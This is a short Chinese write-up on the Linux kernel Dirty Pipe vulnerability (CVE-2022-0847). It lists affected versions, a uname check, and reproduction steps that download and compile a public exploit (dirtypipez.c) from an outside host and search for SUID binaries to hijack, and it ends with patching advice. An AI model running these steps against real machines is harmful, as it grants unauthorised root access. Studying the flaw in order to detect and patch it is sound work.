参考: TeamsSix
参考链接:https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w
0x00 前言
CVSS 评分:7.8
影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root
这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。
0x01 漏洞检测
检测的方法很简单,直接 uname -r ,如果 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 说明可能受到该漏洞的影响。
0x02 漏洞复现
方法二:dirtypipez.c
mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez
编译后生成可执行文件dirtypipez
find / -perm -u=s -type f 2>/dev/null
选一个有suid权限的
复现成功
0x03 安全建议
目前此漏洞已经在Linux 内核 5.16.11、5.15.25 和 5.10.102 中修复。鉴于此漏洞很容易利用以获得root权限,且漏洞利用已经公开,建议受影响用户及时升级更新。
下载链接:
https://kernel.org/
参考: https://www.venustech.com.cn/new_type/aqtg/20220308/23532.html
https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w